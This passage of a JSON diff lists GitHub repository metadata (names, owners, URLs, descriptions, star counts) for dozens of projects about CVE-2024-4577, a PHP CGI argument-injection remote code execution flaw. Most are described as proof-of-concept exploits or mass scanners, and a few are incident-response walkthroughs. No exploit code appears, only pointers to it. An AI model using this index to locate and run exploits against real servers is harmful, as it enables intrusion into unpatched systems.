"2024-06-09T14:20:36Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812806796, + "name": "CVE-2024-4577-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-4577-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-4577-EXPLOIT", + "description": "A PoC exploit for CVE-2024-4577 - PHP CGI Argument Injection Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-06-09T23:32:11Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-07-12T02:56:25Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "argument", + "code-injection", + "cve-2024-4577", + "exploit", + "php", + "php-cgi", + "poc", + "proof-of-concept", + "rce", + "rce-exploit", + "rce-scanner", + "remote-code-execution", + "xamp" + ], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813698508, + "name": "CVE-2024-4577", + "full_name": "bl4cksku11\/CVE-2024-4577", + "owner": { + "login": "bl4cksku11", + "id": 81886705, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81886705?v=4", + "html_url": "https:\/\/github.com\/bl4cksku11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bl4cksku11\/CVE-2024-4577", + "description": "This is a PoC for PHP CVE-2024-4577.", + "fork": false, + "created_at": "2024-06-11T15:11:56Z", + "updated_at": "2024-06-11T15:29:25Z", + "pushed_at": "2024-06-11T15:29:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813923060, + "name": "CVE-2024-4577", + "full_name": "nemu1k5ma\/CVE-2024-4577", + "owner": { + "login": "nemu1k5ma", + "id": 46486428, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46486428?v=4", + "html_url": "https:\/\/github.com\/nemu1k5ma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nemu1k5ma\/CVE-2024-4577", + "description": "php-cgi RCE快速检测", + "fork": false, + "created_at": "2024-06-12T02:16:09Z", + "updated_at": "2024-06-13T01:15:50Z", + "pushed_at": "2024-06-13T01:15:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813963749, + "name": "cve-2024-4577", + "full_name": "aaddmin1122345\/cve-2024-4577", + "owner": { + "login": "aaddmin1122345", + "id": 45313133, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45313133?v=4", + "html_url": "https:\/\/github.com\/aaddmin1122345", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaddmin1122345\/cve-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-12T04:50:25Z", + "updated_at": "2024-09-10T01:27:28Z", + "pushed_at": "2024-09-10T01:27:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814002252, + "name": "Shodan-CVE-2024-4577", + "full_name": "d3ck4\/Shodan-CVE-2024-4577", + "owner": { + "login": "d3ck4", + "id": 6336324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6336324?v=4", + "html_url": "https:\/\/github.com\/d3ck4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d3ck4\/Shodan-CVE-2024-4577", + "description": "POC for CVE-2024-4577 with Shodan integration", + "fork": false, + "created_at": "2024-06-12T06:45:08Z", + "updated_at": "2024-06-12T07:02:39Z", + "pushed_at": "2024-06-12T07:02:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814021668, + "name": "CVE-2024-4577_Analysis", + "full_name": "Entropt\/CVE-2024-4577_Analysis", + "owner": { + "login": "Entropt", + "id": 104687644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104687644?v=4", + "html_url": "https:\/\/github.com\/Entropt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Entropt\/CVE-2024-4577_Analysis", + "description": null, + "fork": false, + "created_at": "2024-06-12T07:33:41Z", + "updated_at": "2024-08-14T20:03:31Z", + "pushed_at": "2024-08-14T20:03:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814127553, + "name": "CVE-2024-4577-PHP-CGI-RCE", + "full_name": "XiangDongCJC\/CVE-2024-4577-PHP-CGI-RCE", + "owner": { + "login": "XiangDongCJC", + "id": 125707007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125707007?v=4", + "html_url": "https:\/\/github.com\/XiangDongCJC", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiangDongCJC\/CVE-2024-4577-PHP-CGI-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-12T11:50:01Z", + "updated_at": "2024-06-12T14:54:31Z", + "pushed_at": "2024-06-12T12:50:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814626066, + "name": "cve-2024-4577", + "full_name": "hexedbyte\/cve-2024-4577", + "owner": { + "login": "hexedbyte", + "id": 133281263, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/133281263?v=4", + "html_url": "https:\/\/github.com\/hexedbyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hexedbyte\/cve-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-13T11:28:33Z", + "updated_at": "2024-06-13T12:43:06Z", + "pushed_at": "2024-06-13T12:43:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814702003, + "name": "CVE-2024-4577", + "full_name": "Sh0ckFR\/CVE-2024-4577", + "owner": { + "login": "Sh0ckFR", + "id": 10033649, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10033649?v=4", + "html_url": "https:\/\/github.com\/Sh0ckFR", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sh0ckFR\/CVE-2024-4577", + "description": "Fixed and minimalist PoC of the CVE-2024-4577", + "fork": false, + "created_at": "2024-06-13T14:25:04Z", + "updated_at": "2024-11-21T05:22:42Z", + "pushed_at": "2024-06-13T15:17:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815387127, + "name": "CVE-2024-4577", + "full_name": "gotr00t0day\/CVE-2024-4577", + "owner": { + "login": "gotr00t0day", + "id": 48636787, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48636787?v=4", + "html_url": "https:\/\/github.com\/gotr00t0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gotr00t0day\/CVE-2024-4577", + "description": "Argument injection vulnerability in PHP", + "fork": false, + "created_at": "2024-06-15T02:49:37Z", + "updated_at": "2024-10-24T16:54:38Z", + "pushed_at": "2024-06-15T02:57:48Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815648681, + "name": "CVE-2024-4577", + "full_name": "sug4r-wr41th\/CVE-2024-4577", + "owner": { + "login": "sug4r-wr41th", + "id": 136193030, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/136193030?v=4", + "html_url": "https:\/\/github.com\/sug4r-wr41th", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sug4r-wr41th\/CVE-2024-4577", + "description": "PHP CGI Remote Code Execution (CVE-2024-4577) PoC", + "fork": false, + "created_at": "2024-06-15T18:05:31Z", + "updated_at": "2024-11-22T07:38:45Z", + "pushed_at": "2024-06-15T18:12:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816417208, + "name": "CVE-2024-4577", + "full_name": "VictorShem\/CVE-2024-4577", + "owner": { + "login": "VictorShem", + "id": 106722243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106722243?v=4", + "html_url": "https:\/\/github.com\/VictorShem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VictorShem\/CVE-2024-4577", + "description": "CVE-2024-4577 POC", + "fork": false, + "created_at": "2024-06-17T17:53:31Z", + "updated_at": "2024-08-23T02:59:16Z", + "pushed_at": "2024-07-31T04:13:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816822296, + "name": "CVE-2024-4577-PHP-CGI-argument-injection-RCE", + "full_name": "jakabakos\/CVE-2024-4577-PHP-CGI-argument-injection-RCE", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-4577-PHP-CGI-argument-injection-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-18T13:19:21Z", + "updated_at": "2024-07-11T08:35:27Z", + "pushed_at": "2024-06-18T13:54:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 819357672, + "name": "CVE-2024-4577-LetsDefend-walkthrough", + "full_name": "PhinehasNarh\/CVE-2024-4577-LetsDefend-walkthrough", + "owner": { + "login": "PhinehasNarh", + "id": 137224635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137224635?v=4", + "html_url": "https:\/\/github.com\/PhinehasNarh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PhinehasNarh\/CVE-2024-4577-LetsDefend-walkthrough", + "description": "This is an Incident Response Walkthrough: Mitigating a Zero-Day Attack (CVE-2024-4577)", + "fork": false, + "created_at": "2024-06-24T10:48:24Z", + "updated_at": "2024-11-19T23:50:04Z", + "pushed_at": "2024-06-24T11:00:16Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 820285162, + "name": "CVE-2024-4577", + "full_name": "ggfzx\/CVE-2024-4577", + "owner": { + "login": "ggfzx", + "id": 86279656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86279656?v=4", + "html_url": "https:\/\/github.com\/ggfzx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ggfzx\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-06-26T07:07:49Z", + "updated_at": "2024-06-27T00:14:08Z", + "pushed_at": "2024-06-26T07:11:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821341176, + "name": "CVE-2024-4577", + "full_name": "olebris\/CVE-2024-4577", + "owner": { + "login": "olebris", + "id": 78493240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78493240?v=4", + "html_url": "https:\/\/github.com\/olebris", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olebris\/CVE-2024-4577", + "description": "CVE-2024-4577", + "fork": false, + "created_at": "2024-06-28T10:19:59Z", + "updated_at": "2024-06-28T10:20:21Z", + "pushed_at": "2024-06-28T10:20:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821427710, + "name": "CVE-2024-4577", + "full_name": "AlperenY-cs\/CVE-2024-4577", + "owner": { + "login": "AlperenY-cs", + "id": 45148606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45148606?v=4", + "html_url": "https:\/\/github.com\/AlperenY-cs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AlperenY-cs\/CVE-2024-4577", + "description": "Create lab for CVE-2024-4577", + "fork": false, + "created_at": "2024-06-28T14:11:15Z", + "updated_at": "2024-07-28T15:32:13Z", + "pushed_at": "2024-06-29T10:39:30Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823727293, + "name": "CVE-2024-4577", + "full_name": "charis3306\/CVE-2024-4577", + "owner": { + "login": "charis3306", + "id": 84823804, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84823804?v=4", + "html_url": "https:\/\/github.com\/charis3306", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/charis3306\/CVE-2024-4577", + "description": "CVE-2024-4577 EXP", + "fork": false, + "created_at": "2024-07-03T15:30:52Z", + "updated_at": "2024-07-03T15:41:46Z", + "pushed_at": "2024-07-03T15:41:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 825104886, + "name": "CVE-2024-4577-RCE", + "full_name": "l0n3m4n\/CVE-2024-4577-RCE", + "owner": { + "login": "l0n3m4n", + "id": 143868630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143868630?v=4", + "html_url": "https:\/\/github.com\/l0n3m4n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3m4n\/CVE-2024-4577-RCE", + "description": "PoC - PHP CGI Argument Injection CVE-2024-4577 (Scanner and Exploit)", + "fork": false, + "created_at": "2024-07-06T19:37:14Z", + "updated_at": "2024-11-20T16:30:53Z", + "pushed_at": "2024-07-07T15:32:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 827089430, + "name": "CVE-2024-4577-RCE-ATTACK", + "full_name": "bibo318\/CVE-2024-4577-RCE-ATTACK", + "owner": { + "login": "bibo318", + "id": 56821442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56821442?v=4", + "html_url": "https:\/\/github.com\/bibo318", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bibo318\/CVE-2024-4577-RCE-ATTACK", + "description": "ATTACK PoC - PHP CVE-2024-4577 ", + "fork": false, + "created_at": "2024-07-11T02:22:32Z", + "updated_at": "2024-09-30T17:27:58Z", + "pushed_at": "2024-07-11T08:37:00Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 829150278, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "waived\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "waived", + "id": 165493645, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165493645?v=4", + "html_url": "https:\/\/github.com\/waived", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/waived\/CVE-2024-4577-PHP-RCE", + "description": "Automated PHP remote code execution scanner for CVE-2024-4577", + "fork": false, + "created_at": "2024-07-15T21:31:14Z", + "updated_at": "2024-11-20T16:30:56Z", + "pushed_at": "2024-09-06T02:10:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4577", + "exploitation", + "php-rce", + "python3", + "remote-code-execution", + "vuln-scanner" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830629911, + "name": "CVE-2024-4577", + "full_name": "nNoSuger\/CVE-2024-4577", + "owner": { + "login": "nNoSuger", + "id": 130155594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130155594?v=4", + "html_url": "https:\/\/github.com\/nNoSuger", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nNoSuger\/CVE-2024-4577", + "description": "CVE", + "fork": false, + "created_at": "2024-07-18T16:39:27Z", + "updated_at": "2024-07-18T16:39:27Z", + "pushed_at": "2024-07-18T16:39:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833329743, + "name": "CVE-2024-4577", + "full_name": "a-roshbaik\/CVE-2024-4577", + "owner": { + "login": "a-roshbaik", + "id": 149660312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149660312?v=4", + "html_url": "https:\/\/github.com\/a-roshbaik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a-roshbaik\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-07-24T20:23:03Z", + "updated_at": "2024-07-24T20:23:03Z", + "pushed_at": "2024-07-24T20:23:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 833330595, + "name": "CVE-2024-4577-PHP-RCE", + "full_name": "a-roshbaik\/CVE-2024-4577-PHP-RCE", + "owner": { + "login": "a-roshbaik", + "id": 149660312, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149660312?v=4", + "html_url": "https:\/\/github.com\/a-roshbaik", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a-roshbaik\/CVE-2024-4577-PHP-RCE", + "description": null, + "fork": false, + "created_at": "2024-07-24T20:25:46Z", + "updated_at": "2024-07-24T20:29:28Z", + "pushed_at": "2024-07-24T20:29:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 836182474, + "name": "CVE-2024-4577", + "full_name": "Jcccccx\/CVE-2024-4577", + "owner": { + "login": "Jcccccx", + "id": 167961583, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167961583?v=4", + "html_url": "https:\/\/github.com\/Jcccccx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jcccccx\/CVE-2024-4577", + "description": "批量验证POC和EXP", + "fork": false, + "created_at": "2024-07-31T10:14:14Z", + "updated_at": "2024-07-31T10:37:59Z", + "pushed_at": "2024-07-31T10:37:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843644753, + "name": "CVE-2024-4577", + "full_name": "bughuntar\/CVE-2024-4577", + "owner": { + "login": "bughuntar", + "id": 99727538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99727538?v=4", + "html_url": "https:\/\/github.com\/bughuntar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bughuntar\/CVE-2024-4577", + "description": "CVE-2024-4577 Exploits", + "fork": false, + "created_at": "2024-08-17T02:01:57Z", + "updated_at": "2024-08-17T02:02:29Z", + "pushed_at": "2024-08-17T02:02:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844815719, + "name": "CVE-2024-4577-RCE", + "full_name": "gh-ost00\/CVE-2024-4577-RCE", + "owner": { + "login": "gh-ost00", + "id": 153366162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153366162?v=4", + "html_url": "https:\/\/github.com\/gh-ost00", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gh-ost00\/CVE-2024-4577-RCE", + "description": "PHP CGI Argument Injection (CVE-2024-4577) RCE", + "fork": false, + "created_at": "2024-08-20T02:56:03Z", + "updated_at": "2024-11-22T10:07:18Z", + "pushed_at": "2024-08-20T03:28:28Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855328284, + "name": "PHP-CGI-RCE-Scanner", + "full_name": "ywChen-NTUST\/PHP-CGI-RCE-Scanner", + "owner": { + "login": "ywChen-NTUST", + "id": 26900397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26900397?v=4", + "html_url": "https:\/\/github.com\/ywChen-NTUST", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ywChen-NTUST\/PHP-CGI-RCE-Scanner", + "description": "Scanning CVE-2024-4577 vulnerability with a url list.", + "fork": false, + "created_at": "2024-09-10T17:31:07Z", + "updated_at": "2024-09-11T14:19:37Z", + "pushed_at": "2024-09-11T14:17:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-4577" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856550359, + "name": "Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-", + "full_name": "AhmedMansour93\/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-268-Rule-Name-SOC292-Possible-PHP-Injection-Detected-CVE-2024-4577-", + "description": "🚨 New Incident Report Completed! 🚨 Just wrapped up \"Event ID 268: SOC292 - Possible PHP Injection Detected (CVE-2024-4577)\" on LetsDefend.io. This analysis involved investigating an attempted Command Injection targeting our PHP server. Staying ahead of these threats with continuous monitoring and swift containment! 🛡️ ", + "fork": false, + "created_at": "2024-09-12T19:10:38Z", + "updated_at": "2024-09-12T19:13:40Z", + "pushed_at": "2024-09-12T19:13:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856557928, + "name": "CVE-2024-4577", + "full_name": "phirojshah\/CVE-2024-4577", + "owner": { + "login": "phirojshah", + "id": 41940520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940520?v=4", + "html_url": "https:\/\/github.com\/phirojshah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phirojshah\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-09-12T19:27:52Z", + "updated_at": "2024-09-16T17:57:37Z", + "pushed_at": "2024-09-12T19:28:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867649513, + "name": "CVE-2024-4577-checker", + "full_name": "JeninSutradhar\/CVE-2024-4577-checker", + "owner": { + "login": "JeninSutradhar", + "id": 111521642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111521642?v=4", + "html_url": "https:\/\/github.com\/JeninSutradhar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JeninSutradhar\/CVE-2024-4577-checker", + "description": "A Bash script designed to scan multiple domains for the CVE-2024-4577 vulnerability in PHP-CGI.", + "fork": false, + "created_at": "2024-10-04T13:10:19Z", + "updated_at": "2024-11-13T14:37:42Z", + "pushed_at": "2024-11-13T14:37:33Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 872339376, + "name": "CVE-2024-4577", + "full_name": "longhoangth18\/CVE-2024-4577", + "owner": { + "login": "longhoangth18", + "id": 152260528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152260528?v=4", + "html_url": "https:\/\/github.com\/longhoangth18", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/longhoangth18\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-10-14T09:11:06Z", + "updated_at": "2024-11-04T07:44:41Z", + "pushed_at": "2024-10-14T09:36:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 882724102, + "name": "CVE-2024-4577", + "full_name": "ahmetramazank\/CVE-2024-4577", + "owner": { + "login": "ahmetramazank", + "id": 109250080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109250080?v=4", + "html_url": "https:\/\/github.com\/ahmetramazank", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahmetramazank\/CVE-2024-4577", + "description": null, + "fork": false, + "created_at": "2024-11-03T15:42:04Z", + "updated_at": "2024-11-03T16:17:52Z", + "pushed_at": "2024-11-03T16:17:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884083771, + "name": "CVE-2024-4577-RCE-PoC", + "full_name": "BTtea\/CVE-2024-4577-RCE-PoC", + "owner": { + "login": "BTtea", + "id": 32271123, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32271123?v=4", + "html_url": "https:\/\/github.com\/BTtea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BTtea\/CVE-2024-4577-RCE-PoC", + "description": 